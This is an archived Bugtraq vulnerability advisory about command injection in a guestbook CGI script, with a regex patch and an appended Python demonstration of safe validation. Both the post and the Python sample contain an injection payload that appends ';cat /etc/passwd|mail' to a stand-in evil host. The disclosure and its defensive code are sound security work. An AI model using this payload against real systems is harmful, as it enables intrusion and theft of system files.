Bugtraq mailing list archives

cgi vulnerability


From: "supdavid" <supdavid () bluewin ch>
Date: Tue, 30 Oct 2001 16:04:23 +0100

hi all
I found a security hole in Book of guests and Post it! written by Seth
Leonard. It is available at http://www.dreamcachersweb.com
The problem is that this script doesn't filter out ANY metacharacters from
the input and passes it to the shell.
Therefore by writing something like email () mail com;cat /etc/passwd|mail
evil () evilhost com into the email field, the attacker could take control
over the host.

patch:
first of all it isn't a bad idea to set the permissions of the script
correctly. Furthermore the line
if ($INPUT{'email'} =~ /(.*)@(.*)/) { ... } should be replaced by something
like
if ($INPUT{'email'} =~ /^[\w.-]+\@[\w.-]+$/) { ... }

David Kumme, 16
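As an added illustration (not code from the post or from the guestbook script), the following Python shows why the unanchored `/(.*)@(.*)/` check lets the quoted payload through, and how an anchored whitelist plus argv-style invocation removes the shell from the picture; the sendmail path and field names are assumptions.

```python
import re

# Unanchored pattern from the original script: it only asks "is there an @
# somewhere?", so any surrounding shell metacharacters pass untouched.
LEGACY_RE = re.compile(r'(.*)@(.*)')

# Anchored whitelist in the spirit of the proposed fix. Note the hyphen is
# placed last inside the class: Python's re rejects the range "\w-." outright,
# and Perl only tolerates it with a warning.
STRICT_RE = re.compile(r'^[\w.-]+@[\w.-]+$')

# Constructed sample inputs: one ordinary address and the payload shape the
# post describes (a ';' and '|' smuggled into the email field).
GOOD = "someone@example.org"
BAD = "email@mail.com;cat /etc/passwd|mail evil@evilhost.com"

def legacy_check(value: str) -> bool:
    """The original, insufficient validation: True for both GOOD and BAD."""
    return LEGACY_RE.search(value) is not None

def is_safe_email(value: str) -> bool:
    """Whole-string whitelist: every character must be [A-Za-z0-9_.-]."""
    return STRICT_RE.fullmatch(value) is not None

def build_unsafe_command(email: str) -> str:
    """Mirrors the flawed pattern: input interpolated into a shell string.
    Shown only so the problem is visible; never hand this to a shell."""
    return f"/usr/lib/sendmail -t {email}"  # assumed sendmail path

def build_safe_argv(email: str) -> list:
    """Validated input becomes a single argv element; no shell parses it.
    Run with subprocess.run(argv) (shell=False, the default)."""
    if not is_safe_email(email):
        raise ValueError("email field contains characters outside whitelist")
    return ["/usr/lib/sendmail", "-t", email]

if __name__ == "__main__":
    for value in (GOOD, BAD):
        print(repr(value))
        print("  legacy check passes:", legacy_check(value))
        print("  strict check passes:", is_safe_email(value))
        print("  shell string would be:", build_unsafe_command(value))
```

Only the strict check refuses the payload; the legacy regex accepts both values, which is exactly the gap the post describes.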

